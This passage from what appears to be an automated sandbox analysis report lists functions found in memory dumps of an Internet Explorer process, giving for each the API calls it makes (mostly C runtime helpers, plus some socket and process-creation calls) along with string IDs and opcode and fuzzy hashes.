      • Opcode ID: 021e78f7ca8f8129c1f3c021c2b4b4dda43a7e4dcb7976d880f3b63894b5aa76
      • Instruction ID: cb7b5782661651b5c84d8f4196d21266a28dd36f5e31b4a67bdcb633a423644b
      • Opcode Fuzzy Hash: 021e78f7ca8f8129c1f3c021c2b4b4dda43a7e4dcb7976d880f3b63894b5aa76
      • Instruction Fuzzy Hash: 34218071901159ABDB24EF76DC54DEFBF78EFD5A04F00009AA91693150EB307902EFA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0301E130 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMONLIBRARYCODE
      Download Yara Rule
      APIs
      • ___BuildCatchObject.LIBCMT ref: 0301E143
        • Part of subcall function 0301E09E: ___BuildCatchObjectHelper.LIBCMT ref: 0301E0D4
      • _UnwindNestedFrames.LIBCMT ref: 0301E15A
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: BuildCatchObject$FramesHelperNestedUnwind
      • String ID: csm$csm
      • API String ID: 3487967840-3733052814
      • Opcode ID: 681ee65cf728d7d097e2b00e0da8922fa23e0e7b776fbaa098440168254b9aeb
      • Instruction ID: 7dd17530517e816982647ef40dd778ac43baf1d22766558d2b48fc24e3d5a9a2
      • Opcode Fuzzy Hash: 681ee65cf728d7d097e2b00e0da8922fa23e0e7b776fbaa098440168254b9aeb
      • Instruction Fuzzy Hash: FB01D235002209BBDF52AF55CC45EEEBFAAEF49354F048014FD1919160D73299B1DBA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B5B5BB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMONLIBRARYCODE
      Download Yara Rule
      APIs
      • GetModuleHandleW.KERNEL32(mscoree.dll,?,04B5B5F3,00000000,?,04B59429,000000FF,0000001E,00000001,00000000,00000000,?,04B5C6B5,00000000,00000001,00000000), ref: 04B5B5C5
      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 04B5B5D5
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: CorExitProcess$mscoree.dll
      • API String ID: 1646373207-1276376045
      • Opcode ID: 0cecf91db928f0632cf3a644ade82ebcc6b9013e65aef7af503a8fc9023577a0
      • Instruction ID: 9792e7ac28c8f0efd1fce395d2a78cd304660d106e02a788659099d619a7a5c0
      • Opcode Fuzzy Hash: 0cecf91db928f0632cf3a644ade82ebcc6b9013e65aef7af503a8fc9023577a0
      • Instruction Fuzzy Hash: C2D012302483467B9F1E1EB6AC09B1A7B9CFD80B9471840E6F818D7160EE6AF900C970
      Uniqueness

      Uniqueness Score: -1.00%

      Function 030135A6 Relevance: 6.2, APIs: 4, Instructions: 161COMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: _memset$_free
      • String ID:
      • API String ID: 2449463427-0
      • Opcode ID: c41c98e6d310a8806774fe1976ef5c0a3d01b3381f98639cff9de84001efa37b
      • Instruction ID: 0a859dd4e7dcceff07905f2a954880341dd37567db4926fc1270eabf6b9c7aa3
      • Opcode Fuzzy Hash: c41c98e6d310a8806774fe1976ef5c0a3d01b3381f98639cff9de84001efa37b
      • Instruction Fuzzy Hash: 7A513175D027289FDB21EBA8CC84DEEB7BCEF85700F1401A5E505E6150EB355A94CF52
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0301EEEF Relevance: 6.1, APIs: 4, Instructions: 109COMMONLIBRARYCODE
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: __calloc_crt__init_pointers__mtterm_free
      • String ID:
      • API String ID: 3556499859-0
      • Opcode ID: 6bd1ec01e2c55118e8059485c3202aa70c6f32d0bad61198a3302cf402aaf824
      • Instruction ID: c200d78d8f8258fc21b562ac98ef7d76f87484d93c3da2daef9c275d9910ac0e
      • Opcode Fuzzy Hash: 6bd1ec01e2c55118e8059485c3202aa70c6f32d0bad61198a3302cf402aaf824
      • Instruction Fuzzy Hash: 50311E35801735AFE722FB75CC8869A7FA9EB49360B14061BEC14DB2B0DB748162CF58
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B485B4 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95COMMON
      Download Yara Rule
      APIs
      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 04B48610
      • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000), ref: 04B48635
      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 04B48682
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: ByteCharMultiWide
      • String ID: utf-8
      • API String ID: 626452242-1463810698
      • Opcode ID: ae039e3c7f5f64036ecaf3a8583bf7601f5b0c7967994fbd261c3d9f3ebf9aa3
      • Instruction ID: 4d7df95115463d1b15470697530911294a28ccacabbd603a2668f0e67a235811
      • Opcode Fuzzy Hash: ae039e3c7f5f64036ecaf3a8583bf7601f5b0c7967994fbd261c3d9f3ebf9aa3
      • Instruction Fuzzy Hash: C321B6B1A10204BFEB14AFB9DD45EAFBBFDEF80304F0044A9E915D6260EA71ED059B10
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B564B8 Relevance: 6.1, APIs: 4, Instructions: 90networkCOMMON
      Download Yara Rule
      APIs
      • gethostname.WS2_32(?,00000400), ref: 04B564FA
      • connect.WS2_32(?,?,00000010), ref: 04B56565
      • closesocket.WS2_32(?), ref: 04B56572
        • Part of subcall function 04B561F1: getaddrinfo.WS2_32(?,00000000,?,00000000), ref: 04B56221
      • accept.WS2_32(?,?,?), ref: 04B56595
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: acceptclosesocketconnectgetaddrinfogethostname
      • String ID:
      • API String ID: 571467608-0
      • Opcode ID: 996c7f585db5a5ea4a9ee4ce3ad69894c53705ec2f3ebdd0ece23b454b7cfd5c
      • Instruction ID: 1b148716ca3da82890e208700e44156d2ccd4baee661ce35c09befc8f89a6818
      • Opcode Fuzzy Hash: 996c7f585db5a5ea4a9ee4ce3ad69894c53705ec2f3ebdd0ece23b454b7cfd5c
      • Instruction Fuzzy Hash: 8731A1B1A10608AFDB20DF64DC80BAAB7F8FB15305F4005AEE64AD7590D774B948CB25
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0301FE3A Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
      • String ID:
      • API String ID: 3016257755-0
      • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
      • Instruction ID: 10fd770fbe10b1f91bce21d8fc2cbf0136291c5abae614cfb1a797ceaed293fa
      • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
      • Instruction Fuzzy Hash: D3114B7640114ABBCF229E84CC11DEE3FA6BB59294B498A15FE1899035C337C5B1AB81
      Uniqueness

      Uniqueness Score: -1.00%

      Function 03021729 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
      Download Yara Rule
      APIs
      • __getptd.LIBCMT ref: 03021735
        • Part of subcall function 0301ED38: __getptd_noexit.LIBCMT ref: 0301ED3B
        • Part of subcall function 0301ED38: __amsg_exit.LIBCMT ref: 0301ED48
      • __amsg_exit.LIBCMT ref: 03021755
      • __lock.LIBCMT ref: 03021765
      • _free.LIBCMT ref: 03021795
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
      • String ID:
      • API String ID: 3170801528-0
      • Opcode ID: a0aebf81548fd5ee05eb12b50fc5f1aa2e8b5e36873616e842a07805b486962f
      • Instruction ID: 2cbd252e793a4e361126570c22d76517b7cad0c3fa4ebd52f68a433ec4123b56
      • Opcode Fuzzy Hash: a0aebf81548fd5ee05eb12b50fc5f1aa2e8b5e36873616e842a07805b486962f
      • Instruction Fuzzy Hash: 2D016135D02B31AFD766EB258884BEFBBF4BF85710F084505E8146B280CB345591CBD1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B5EC2B Relevance: 6.0, APIs: 4, Instructions: 45threadCOMMONLIBRARYCODE
      Download Yara Rule
      APIs
      • GetLastError.KERNEL32(?,?,04B5C81C,04B58DA9,?,?,04B42E4E,00000000,?,04B4C99A,?,?,?,04B4CE5E,00000000), ref: 04B5EC2F
        • Part of subcall function 04B5EAE9: TlsGetValue.KERNEL32(?,04B5EC42,?,04B42E4E,00000000,?,04B4C99A,?,?,?,04B4CE5E,00000000), ref: 04B5EAF2
        • Part of subcall function 04B5EAE9: RtlDecodePointer.NTDLL ref: 04B5EB04
        • Part of subcall function 04B5EAE9: TlsSetValue.KERNEL32(00000000,?,04B42E4E,00000000,?,04B4C99A,?,?,?,04B4CE5E,00000000), ref: 04B5EB13
      • SetLastError.KERNEL32(00000000,?,04B42E4E,00000000,?,04B4C99A,?,?,?,04B4CE5E,00000000), ref: 04B5EC99
        • Part of subcall function 04B5C6E9: Sleep.KERNEL32(00000000), ref: 04B5C711
      • RtlDecodePointer.NTDLL(00000000), ref: 04B5EC6B
        • Part of subcall function 04B5EB77: GetModuleHandleW.KERNEL32(KERNEL32.DLL,04B76E58,00000008,04B5EC7F,00000000,00000000,?,04B42E4E,00000000,?,04B4C99A,?,?,?,04B4CE5E,00000000), ref: 04B5EB88
        • Part of subcall function 04B5EB77: InterlockedIncrement.KERNEL32(?), ref: 04B5EBC9
      • GetCurrentThreadId.KERNEL32 ref: 04B5EC81
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: DecodeErrorLastPointerValue$CurrentHandleIncrementInterlockedModuleSleepThread
      • String ID:
      • API String ID: 68510339-0
      • Opcode ID: 6f2653163527bf32399a50a3da2fb4044a723f92c335694ba26ab67e910ebba2
      • Instruction ID: c82163245a86b78acbff748f5cb40be8dd9d6e3d4aa42101d591dcdd13cc52b9
      • Opcode Fuzzy Hash: 6f2653163527bf32399a50a3da2fb4044a723f92c335694ba26ab67e910ebba2
      • Instruction Fuzzy Hash: 92F0F4334057216BE7312B797D09B9ABF64DF45772B10028AFC19D71A0CF24ED019AB0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 03002055 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
      Download Yara Rule
      APIs
      • std::_Lockit::_Lockit.LIBCPMT ref: 03002062
      • std::exception::exception.LIBCMT ref: 03002092
        • Part of subcall function 03018CCD: std::exception::_Copy_str.LIBCMT ref: 03018CE8
      • __CxxThrowException@8.LIBCMT ref: 030020A7
      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 030020B0
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: std::_$Copy_strException@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::exception::_std::exception::exception
      • String ID:
      • API String ID: 118770642-0
      • Opcode ID: d832e093e2715a60e765007ce15b4a54f0df98affa4bea91e2b5ba2c801a8a80
      • Instruction ID: a530a4e07ae314ea840922ca27803efb850b36cac8c39f88127da44a0f6cc4a1
      • Opcode Fuzzy Hash: d832e093e2715a60e765007ce15b4a54f0df98affa4bea91e2b5ba2c801a8a80
      • Instruction Fuzzy Hash: 47018676806748AEC721DF9994C08CBFFF8AE18240784C56EE54987601D774E208CBA5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0301B98B Relevance: 6.0, APIs: 4, Instructions: 34COMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: ___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
      • String ID:
      • API String ID: 865245655-0
      • Opcode ID: eff840a7fb55ffa015c0d45cdfdc8c68c57f1e57f225779ed02442c4ca857e2f
      • Instruction ID: d7ff9d7fd7ab8118a0502d3ea147533d0b165d751c3307ac54553091bb53b86d
      • Opcode Fuzzy Hash: eff840a7fb55ffa015c0d45cdfdc8c68c57f1e57f225779ed02442c4ca857e2f
      • Instruction Fuzzy Hash: 94F0F978502754AFD704FF61C98889F7BA9AFC92447148558E94A8F221DB34D463CB90
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B5EDED Relevance: 6.0, APIs: 4, Instructions: 34COMMON
      Download Yara Rule
      APIs
      • TlsGetValue.KERNEL32(00000000,?,04B5B8AB,00000000,?,000000FF,?,04B65D4D,00000011,00000000,?,04B5EBC1,0000000D), ref: 04B5EE0E
      • TlsGetValue.KERNEL32(?,04B5B8AB,00000000,?,000000FF,?,04B65D4D,00000011,00000000,?,04B5EBC1,0000000D), ref: 04B5EE20
      • RtlDecodePointer.NTDLL(00000000), ref: 04B5EE36
      • TlsSetValue.KERNEL32(00000020,00000000,?,04B5B8AB,00000000,?,000000FF,?,04B65D4D,00000011,00000000,?,04B5EBC1,0000000D), ref: 04B5EE53
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Value$DecodePointer
      • String ID:
      • API String ID: 721062344-0
      • Opcode ID: 0838f48348c0a1a244ea21ebd3c2d9ca03b513f325a42a95c20ac277f047ea6f
      • Instruction ID: 165e2f54e958981bedddc091dda58b0e08c3f28b6e086786e80960b4ebaf4a94
      • Opcode Fuzzy Hash: 0838f48348c0a1a244ea21ebd3c2d9ca03b513f325a42a95c20ac277f047ea6f
      • Instruction Fuzzy Hash: 8EF0F931400204AAEB615F64FD09B593F65EB093A1F144262AD29975B0CB39AE61ABB4
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0301BAF2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
      Download Yara Rule
      APIs
        • Part of subcall function 0301B8E8: _doexit.LIBCMT ref: 0301B8F4
      • ___set_flsgetvalue.LIBCMT ref: 0301BB03
      • ___fls_getvalue@4.LIBCMT ref: 0301BB0E
      • ___fls_setvalue@8.LIBCMT ref: 0301BB20
      • __freefls@4.LIBCMT ref: 0301BB4C
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: ___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
      • String ID:
      • API String ID: 1760487837-0
      • Opcode ID: 4dcf5278da59764a9560cff02305b48f8bd950069605a83fae811cd98af6b26e
      • Instruction ID: 88d2c6203c86a589c647a9c4894cc04a0f164145ff85df4b37b0fb718e967193
      • Opcode Fuzzy Hash: 4dcf5278da59764a9560cff02305b48f8bd950069605a83fae811cd98af6b26e
      • Instruction Fuzzy Hash: 73F01D789023049FCB08FBA1C98489F7BA9AFC8204B208554AD068B625DB35D862DA91
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B50731 Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
      Download Yara Rule
      APIs
      • TerminateThread.KERNEL32(00000000,00000000,76C86530,?,04B50778,04B4D27A,?,?,?,?,?,?,00000000,00000000,?,?), ref: 04B5073E
      • CloseHandle.KERNEL32(?,76C86530,?,04B50778,04B4D27A,?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 04B50752
      • CloseHandle.KERNEL32(?,76C86530,?,04B50778,04B4D27A,?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 04B5075C
      • CloseHandle.KERNEL32(?,76C86530,?,04B50778,04B4D27A,?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 04B50766
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandle$TerminateThread
      • String ID:
      • API String ID: 2297604343-0
      • Opcode ID: ae0c734cdd9aefa0c6790a32a21a93c84a42ccdd060425269ab01b01feccafc9
      • Instruction ID: dc6dab1356d9b57d78325247cb993a164a73991c0de760758dfd74ad7077cbc4
      • Opcode Fuzzy Hash: ae0c734cdd9aefa0c6790a32a21a93c84a42ccdd060425269ab01b01feccafc9
      • Instruction Fuzzy Hash: EAE0E5316047119BDB30BA6AAC84F57A3ECEF44B60B06495AEC55E3650DA64F8428EB0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0301BAFE Relevance: 6.0, APIs: 4, Instructions: 29COMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: ___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
      • String ID:
      • API String ID: 865245655-0
      • Opcode ID: 99bcf70d96610f6a8388285eaab498e22e81d659d1f8531dd77f612df49d2c25
      • Instruction ID: fbaabf88268f13ce46f54e37ab4aa552cb5b76b74d284ecf289c27b9ab55f238
      • Opcode Fuzzy Hash: 99bcf70d96610f6a8388285eaab498e22e81d659d1f8531dd77f612df49d2c25
      • Instruction Fuzzy Hash: DAF012785033045FD718FF71C9C4C9F7BA9AFC8244B148554AC4A8F626DB35D462D691
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B44D24 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 420COMMON
      Download Yara Rule
      APIs
      • std::locale::facet::_Incref.LIBCPMT ref: 04B44D6D
      • _Maklocchr.LIBCPMT ref: 04B44DB8
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: IncrefMaklocchrstd::locale::facet::_
      • String ID: e
      • API String ID: 1314436319-4024072794
      • Opcode ID: 37125b1257702162c230a5a3dcb7af2a99271b8127faed15590c9d80afb33861
      • Instruction ID: 31694855757896b2291bb5bf344bc41300cb693fbe950daf54d018f215e294c7
      • Opcode Fuzzy Hash: 37125b1257702162c230a5a3dcb7af2a99271b8127faed15590c9d80afb33861
      • Instruction Fuzzy Hash: 61021571D00219EFEF15DFA4CD44AEEBBB9FF48304F044499E819AB261D731AA25EB50
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0300DB94 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON
      Download Yara Rule
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: _memset
      • String ID: B$Z
      • API String ID: 2102423945-4127840752
      • Opcode ID: 97a40fea54dec5dfa2c13f704af92e7f045d037c5367db0f7a77d69d530df7f3
      • Instruction ID: a4bc0ccff7cc8ab6b16da3e8545b2634fed4c896fc39093a48ef50dc7dc02ab1
      • Opcode Fuzzy Hash: 97a40fea54dec5dfa2c13f704af92e7f045d037c5367db0f7a77d69d530df7f3
      • Instruction Fuzzy Hash: 00513C7090526DCAFF64EB90CC897E9B7F9AB04704F1884EBC115AA191D6B496C4CFA1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 03011572 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
      Download Yara Rule
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: _memset
      • String ID: D
      • API String ID: 2102423945-2746444292
      • Opcode ID: 038e0eab4a1be8ad5638e13af7d1f7d7325c464b55b2565f04a9229fac99092b
      • Instruction ID: c5992cf61aad7b1e2363ef001a11fa4801a42da1b9e487be06f4e91cfff6249d
      • Opcode Fuzzy Hash: 038e0eab4a1be8ad5638e13af7d1f7d7325c464b55b2565f04a9229fac99092b
      • Instruction Fuzzy Hash: 9731DBF5A112289FDB60DF64CC84BCAB7F8EF48310F4040A9E609E7241D7749A94CF68
      Uniqueness

      Uniqueness Score: -1.00%

      Function 03011571 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
      Download Yara Rule
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: _memset
      • String ID: D
      • API String ID: 2102423945-2746444292
      • Opcode ID: cc97cf484279ae63c5931d1969752f1d217f033102ac0d395fd4468e8916f12c
      • Instruction ID: 968f71a4c7c27689c3ba0a26c211278580d70deb6d16f131c09ee206cd730c46
      • Opcode Fuzzy Hash: cc97cf484279ae63c5931d1969752f1d217f033102ac0d395fd4468e8916f12c
      • Instruction Fuzzy Hash: 7C31DBB1A11228ABDB60DF64CC84BCABBF8EF48310F4044A9E709E7241D7749A948F59
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B514DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83processCOMMON
      Download Yara Rule
      APIs
      • GetCurrentProcess.KERNEL32(?,?,00000000), ref: 04B51521
      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,00000044,?), ref: 04B515DF
      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 04B515F6
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Process$CloseCreateCurrentHandle
      • String ID: D
      • API String ID: 240546133-2746444292
      • Opcode ID: 28b0a24fb879b3107d47d02f7b6fc7e8aebe2b16269278895dcc8c5cd9aea336
      • Instruction ID: 952a6efc24ef777f926bd5758f334f94a2b688310c5ec3c74ede868dfa85f334
      • Opcode Fuzzy Hash: 28b0a24fb879b3107d47d02f7b6fc7e8aebe2b16269278895dcc8c5cd9aea336
      • Instruction Fuzzy Hash: B931E0F1A01128AADB60DF68CC85BCAB7F8EF48354F4044E5A609E7251D7749A848F69
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0300E0C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
      Download Yara Rule
      APIs
      • __EH_prolog3_catch.LIBCMT ref: 0300E0CE
      • std::_Xinvalid_argument.LIBCPMT ref: 0300E0E5
        • Part of subcall function 03018011: std::exception::exception.LIBCMT ref: 03018026
        • Part of subcall function 03018011: __CxxThrowException@8.LIBCMT ref: 0301803B
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Exception@8H_prolog3_catchThrowXinvalid_argumentstd::_std::exception::exception
      • String ID: @
      • API String ID: 1905828624-2766056989
      • Opcode ID: 0c045cba4c9a4f10447bbdc0e24671f9c10bfdef8b169b95c4a3c7aae2ea07b4
      • Instruction ID: a85a6042f9b611f28183eee906932dce7b617cf3a2f4e7c94599ecd573c4d792
      • Opcode Fuzzy Hash: 0c045cba4c9a4f10447bbdc0e24671f9c10bfdef8b169b95c4a3c7aae2ea07b4
      • Instruction Fuzzy Hash: AC11B275A027059FDB24DF68C980A9DB7F0EF54310F24891DE555EB2D0DB30EA80CB54
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0301DB02 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
      Download Yara Rule
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CallFrame@12Setting__getptd
      • String ID: j
      • API String ID: 3454690891-2137352139
      • Opcode ID: fda4dfb616622cb0366f5f8af0e7228d3b77107b78bb831b15d841edec0260b1
      • Instruction ID: 676c1ef71abbe06377cf0842403ca19962e57c9ebec5a173e1b48f2df331f1e0
      • Opcode Fuzzy Hash: fda4dfb616622cb0366f5f8af0e7228d3b77107b78bb831b15d841edec0260b1
      • Instruction Fuzzy Hash: 9E11A979802254EFCB10DF18C5843AEFBB0BF04318F188689D8962F682C37069A5CB81
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0301DEA9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
      Download Yara Rule
      APIs
      • __getptd.LIBCMT ref: 0301DEB8
        • Part of subcall function 0301ED38: __getptd_noexit.LIBCMT ref: 0301ED3B
        • Part of subcall function 0301ED38: __amsg_exit.LIBCMT ref: 0301ED48
      • __getptd.LIBCMT ref: 0301DEC6
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: __getptd$__amsg_exit__getptd_noexit
      • String ID: csm
      • API String ID: 803148776-1018135373
      • Opcode ID: 9940016f2ae665ea65af1b380e1f88aee23af8b8ce1812b5ed7e633863f40bd2
      • Instruction ID: bc8decd934308fc7d46aba36f71c8bd2c4131168151bb1fcd93cd2425a0ce9ac
      • Opcode Fuzzy Hash: 9940016f2ae665ea65af1b380e1f88aee23af8b8ce1812b5ed7e633863f40bd2
      • Instruction Fuzzy Hash: 4E016939802305DBDF74EF20C4506BDF3FABF44211FA8486ED441AAAA0CB34D6A1CB61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B4DEFA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
      Download Yara Rule
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Versionwsprintf
      • String ID: (NT %d.%d Build %d)
      • API String ID: 2108043187-379029606
      • Opcode ID: 11106ed03d2601f68a55a56d557a3635eb194681e91bb89c85851ac9109f557e
